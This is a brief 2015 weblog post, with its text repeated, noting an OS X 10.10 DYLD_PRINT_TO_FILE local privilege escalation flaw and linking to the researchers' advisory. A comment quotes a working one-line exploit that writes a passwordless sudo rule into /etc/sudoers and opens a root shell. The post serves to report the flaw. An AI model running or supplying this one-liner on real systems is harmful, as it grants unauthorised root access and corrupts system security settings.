Mac OS privilege escalation
2015-07-26 22:40:48.64636+00 by Dan Lyke 1 comments
Security is hard: OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability.
2015-07-26 22:40:48.64636+00 by Dan Lyke 1 comments
Security is hard: OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability.
[ related topics: Weblogs Macintosh ]
comments in ascending chronological order (reverse):
#Comment Re: Mac OS privilege escalation made: 2015-07-27 15:49:49.365703+00 by: Dan Lyke
Oops.
$ echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s #
https://www.sektioneins.de/blo...7-07-dyld_print_to_file_lpe.html